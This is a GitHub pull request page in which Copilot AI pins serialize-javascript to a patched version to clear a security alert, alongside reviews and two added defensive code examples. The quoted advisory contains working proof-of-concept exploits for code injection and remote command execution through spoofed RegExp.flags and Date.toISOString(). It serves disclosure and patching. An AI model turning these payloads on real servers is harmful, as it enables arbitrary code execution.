
Update serialize-javascript to 7.0.3 via npm override (GHSA-5c6j-r48x-rmvq) #264

Merged
robandpdx merged 2 commits into main from copilot/fix-serialize-javascript-vulnerability on Apr 8, 2026

Conversation


Copilot AI commented Apr 8, 2026

serialize-javascript@6.0.2 has a high-severity RCE via unsanitized RegExp.flags and Date.prototype.toISOString() interpolation (incomplete fix for CVE-2020-7660).

Changes

  • Added npm overrides to pin serialize-javascript to 7.0.3. Required because the sole consumer (mocha@11.7.5) constrains it to ^6.0.2 and hasn't updated yet.

```json
"overrides": {
  "serialize-javascript": "7.0.3"
}
```

Reachability Assessment

Not reachable — high confidence. serialize-javascript is pulled in only by mocha (devDependency). Application code never imports or calls serialize(). Production builds use npm ci --production, so the package isn't even installed in containers. Update is to clear the Dependabot alert, not to mitigate active risk.

Compatibility

serialize-javascript@7.0.3 requires Node ≥20. Dockerfile base image is node:20-slim. Dev-only dependency, so no production surface.

Original prompt

This section details the Dependabot vulnerability alert you should resolve

<alert_title>Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()</alert_title>
<alert_description>### Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

```js
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
```

### PoC 2: Code Injection via Date.toISOString()

```js
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
```

### PoC 3: Remote Code Execution

```js
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
```

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3</alert_description>

Severity: high
Advisory: GHSA-5c6j-r48x-rmvq
Package: serialize-javascript (npm)
<vulnerable_versions>6.0.2</vulnerable_versions>
<patched_version>7.0.3</patched_version>
<manifest_path>package-lock.json</manifest_path>

https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq
https://nvd.nist.gov/vuln/detail/CVE-2020-7660
https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9
https://github.com/advisories/GHSA-hxcc-f52p-wc94
https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
https://github.com/advisories/GHSA-5c6j-r48x-rmvq

<task_instructions>Resolve this alert by updating the affected package to a non-vulnerable version. Prefer the lowest non-vulnerable version (see the patched_version field above) over the latest to minimize breaking changes. Include a Reachability Assessment section in the PR description. Review the alert_description field to understand which APIs, features, or configurations are affected, then search the codebase for usage of those specific items. If the vulnerable code path is reachable, explain how (which files, APIs, or call sites use the affected functionality) and note that the codebase is actively exposed to this vulnerability. If the vulnerable code path is not reachable, explain why (e.g. the affected API is never called, the vulnerable configuration is not used) and note that the update is primarily to satisfy vulnerability scanners rather than to address an active risk. If the advisory is too vague to determine reachability (e.g. 'improper input validation' with no specific API named), state that reachability could not be determined and explain why. Include a confidence level in the reachability assessment (e.g. high confidence if the advisory names a specific API and you confirmed it is or is not called, low confidence if the usage is indirect and hard to trace). If no patched version is available, check the alert_description field for a Workarounds section — the advisory may describe configuration changes or usage patterns that miti...
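The advisory above describes the defect as a string interpolated raw into generated code: `RegExp.flags` and `Date.prototype.toISOString()` are trusted even though any object that passes `instanceof` can return arbitrary text from them. The following is an added example, not code from serialize-javascript, from its 7.0.3 fix, or from this PR. It shows the two defensive properties that close this class of hole: every piece of attacker-influenced text is emitted as a quoted string literal rather than spliced in raw, and the values are additionally allow-listed against the only shapes a genuine `RegExp` or `Date` can produce. All function and constant names (`quote`, `serializeRegExpSafely`, `serializeDateSafely`, `serializeValue`, `makeSpoofedRegExp`, `demo`) are assumptions for the example; the spoofed object built at the end is constructed like the advisory's first PoC but carries an inert marker instead of a payload.

```javascript
// Added example (not serialize-javascript's own code): a minimal serializer for
// RegExp and Date values that never interpolates them raw into the output and
// allow-lists what `.flags` and `.toISOString()` may return.

// ECMAScript regular-expression flag letters; nothing else may appear in .flags.
const VALID_FLAGS = /^[dgimsuvy]*$/;
// Shape of Date.prototype.toISOString() output for a finite date.
const VALID_ISO_DATE = /^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z$/;

// Emit a JavaScript string literal. JSON.stringify escapes quotes, backslashes
// and control characters; "<" is additionally escaped so the output stays inert
// inside a <script> element (it can never form "</script>").
function quote(str) {
  return JSON.stringify(String(str)).replace(/</g, '\\u003C');
}

function serializeRegExpSafely(re) {
  if (!(re instanceof RegExp)) throw new TypeError('expected a RegExp');
  // Read each accessor exactly once; a hostile object could return different
  // values on successive reads.
  const source = String(re.source);
  const flags = String(re.flags);
  if (!VALID_FLAGS.test(flags)) {
    throw new Error(`refusing to serialize RegExp: unexpected flags ${quote(flags)}`);
  }
  // Quoting both pieces is what prevents injection even without the allow-list.
  return `new RegExp(${quote(source)}, ${quote(flags)})`;
}

function serializeDateSafely(d) {
  if (!(d instanceof Date)) throw new TypeError('expected a Date');
  const iso = String(d.toISOString());
  if (!VALID_ISO_DATE.test(iso)) {
    throw new Error(`refusing to serialize Date: unexpected ISO string ${quote(iso)}`);
  }
  return `new Date(${quote(iso)})`;
}

// Recursive wrapper for plain data. Functions, undefined and symbols are
// rejected rather than silently emitted.
function serializeValue(v) {
  if (v instanceof RegExp) return serializeRegExpSafely(v);
  if (v instanceof Date) return serializeDateSafely(v);
  if (Array.isArray(v)) return `[${v.map(serializeValue).join(',')}]`;
  if (v !== null && typeof v === 'object') {
    const parts = Object.keys(v).map((k) => `${quote(k)}:${serializeValue(v[k])}`);
    return `{${parts.join(',')}}`;
  }
  if (typeof v === 'string') return quote(v);
  const literal = JSON.stringify(v); // number, boolean, null
  if (literal === undefined) throw new TypeError(`unsupported value of type ${typeof v}`);
  return literal;
}

// Constructed test input shaped like the advisory's first PoC: passes
// `instanceof RegExp`, but `.flags` is an arbitrary string.
function makeSpoofedRegExp(flags) {
  const fake = Object.create(RegExp.prototype);
  Object.defineProperty(fake, 'source', { get: () => 'x' });
  Object.defineProperty(fake, 'flags', { get: () => flags });
  return fake;
}

function demo() {
  const results = [serializeValue({ re: /ab+c/gi, when: new Date(Date.UTC(2024, 0, 1)) })];
  try {
    serializeValue({ re: makeSpoofedRegExp('"+1+"') }); // inert marker, not a payload
    results.push('spoofed RegExp accepted (unexpected)');
  } catch (err) {
    results.push(`spoofed RegExp rejected: ${err.message}`);
  }
  return results;
}

console.log(demo().join('\n'));
```

Even if the allow-list were omitted, `quote()` alone turns the spoofed flags into a harmless string argument that `new RegExp` rejects at runtime with a SyntaxError; the allow-list turns that late failure into an early, loud one at serialization time, which is where a server wants to learn that it was handed a forged object.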

Copilot AI changed the title [WIP] Fix serialize-javascript vulnerability in RegExp.flags and Date.prototype.toISOString Update serialize-javascript to 7.0.3 via npm override (GHSA-5c6j-r48x-rmvq) Apr 8, 2026
Copilot AI requested a review from lindluni April 8, 2026 01:51

github-actions bot commented Apr 8, 2026


```text
=============================== Coverage summary ===============================
Statements   : 100% ( 149/149 )
Branches     : 100% ( 88/88 )
Functions    : 100% ( 27/27 )
Lines        : 100% ( 148/148 )
================================================================================
```

@lindluni lindluni marked this pull request as ready for review April 8, 2026 02:35
@lindluni lindluni requested a review from robandpdx as a code owner April 8, 2026 02:35
Copilot AI review requested due to automatic review settings April 8, 2026 02:35

Copilot AI left a comment


Pull request overview

Pins a vulnerable transitive dev dependency (serialize-javascript) to a patched version using npm overrides, addressing GHSA-5c6j-r48x-rmvq while keeping the existing mocha version.

Changes:

  • Add overrides.serialize-javascript = 7.0.3 to force the patched version.
  • Update package-lock.json to reflect serialize-javascript@7.0.3 under mocha (and remove the old 6.0.2 entry).
| File | Description |
| --- | --- |
| package.json | Adds npm override to pin serialize-javascript to 7.0.3. |
| package-lock.json | Locks transitive dependency resolution to serialize-javascript@7.0.3 under mocha. |

Copilot's findings


  • Files reviewed: 1/2 changed files
  • Comments generated: 1

Comment on lines +31 to 34

```json
  },
  "overrides": {
    "serialize-javascript": "7.0.3"
  }
```
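Review bot: the override is an exact pin, `"serialize-javascript": "7.0.3"`, so later 7.x patch releases will not be picked up until someone edits package.json again; the description justifies the pin only by mocha@11.7.5 still constraining the range to ^6.0.2, so leave a comment next to the override (or a tracking issue) to remove it once mocha's own range admits 7.x, otherwise a temporary workaround silently becomes permanent.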

Copilot AI Apr 8, 2026


This override pulls in serialize-javascript@7.x which requires Node >=20. If the project expects contributors to run on Node 18 locally, consider declaring the Node requirement explicitly (e.g., package.json "engines" / .nvmrc / short README note) to avoid confusing install/runtime issues.

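The review summary above notes that package-lock.json must now resolve serialize-javascript@7.0.3 under mocha with the 6.0.2 entry gone. An override only helps if the lock file really reflects it, and a second, nested copy of the package would keep the alert alive. The script below is an added example, not part of this PR or of npm: it walks the `packages` map of a lockfileVersion 2/3 lock file, lists every installed copy of a package, and compares each against the patched version. The two lock fragments and the package.json fragment are constructed to resemble the state before and after this PR; they are not the repository's real files. Function names (`compareVersions`, `findInstalledCopies`, `auditLock`, `overrideDeclared`, `loadLockFile`, `report`) are assumptions for the example.

```javascript
// Added example (not npm's or this PR's code): verify that an npm override
// actually changed what package-lock.json records as installed.

const PACKAGE = 'serialize-javascript';
const PATCHED = '7.0.3';

// Constructed: lock state while mocha still resolves ^6.0.2 on its own.
const SAMPLE_LOCK_BEFORE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', devDependencies: { mocha: '^11.7.5' } },
    'node_modules/mocha': { version: '11.7.5', dev: true, dependencies: { 'serialize-javascript': '^6.0.2' } },
    'node_modules/serialize-javascript': { version: '6.0.2', dev: true },
  },
};

// Constructed: the same lock after the override is applied.
const SAMPLE_LOCK_AFTER = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', devDependencies: { mocha: '^11.7.5' } },
    'node_modules/mocha': { version: '11.7.5', dev: true, dependencies: { 'serialize-javascript': '^6.0.2' } },
    'node_modules/serialize-javascript': { version: '7.0.3', dev: true, engines: { node: '>=20' } },
  },
};

// Constructed: the package.json fragment the PR adds.
const SAMPLE_PACKAGE_JSON = { overrides: { 'serialize-javascript': '7.0.3' } };

// Numeric compare of "major.minor.patch" strings; prerelease tags are ignored.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Every installed copy of `name`, including nested ones such as
// "node_modules/mocha/node_modules/serialize-javascript" (and scoped names).
function findInstalledCopies(lock, name) {
  const copies = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry
    const idx = path.lastIndexOf('node_modules/');
    if (idx === -1) continue; // workspace or link entries
    if (path.slice(idx + 'node_modules/'.length) === name) {
      copies.push({ path, version: meta.version, dev: Boolean(meta.dev) });
    }
  }
  return copies;
}

// ok is true only when the package is present and every copy is >= patched.
function auditLock(lock, name, patched) {
  const copies = findInstalledCopies(lock, name);
  const vulnerable = copies.filter((c) => compareVersions(c.version, patched) < 0);
  return { copies, vulnerable, ok: copies.length > 0 && vulnerable.length === 0 };
}

// Cross-check that package.json declares the override the lock file relies on.
function overrideDeclared(pkg, name, version) {
  return Boolean(pkg.overrides && pkg.overrides[name] === version);
}

// For a real checkout (assumed usage): loadLockFile('./package-lock.json').
// `require` is resolved lazily so the module also loads under ESM.
function loadLockFile(filePath) {
  const fs = require('node:fs');
  return JSON.parse(fs.readFileSync(filePath, 'utf8'));
}

function report(lock, pkg, name, patched) {
  const { copies, vulnerable, ok } = auditLock(lock, name, patched);
  const lines = copies.map((c) => `${c.path} -> ${c.version}${c.dev ? ' (dev)' : ''}`);
  lines.push(ok ? `OK: every copy of ${name} is >= ${patched}` : `FAIL: ${vulnerable.length} copy/copies of ${name} below ${patched}`);
  lines.push(`override declared in package.json: ${overrideDeclared(pkg, name, patched)}`);
  return lines.join('\n');
}

console.log('--- before ---\n' + report(SAMPLE_LOCK_BEFORE, SAMPLE_PACKAGE_JSON, PACKAGE, PATCHED));
console.log('--- after ---\n' + report(SAMPLE_LOCK_AFTER, SAMPLE_PACKAGE_JSON, PACKAGE, PATCHED));
```

Running the same audit against the real lock file is the quick way to confirm the review summary's claim that the 6.0.2 entry is gone, and to catch the case where a second consumer later pulls in its own nested copy that the override did not reach.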
@robandpdx robandpdx merged commit ead8a99 into main Apr 8, 2026
9 checks passed
@robandpdx robandpdx deleted the copilot/fix-serialize-javascript-vulnerability branch April 8, 2026 22:32

4 participants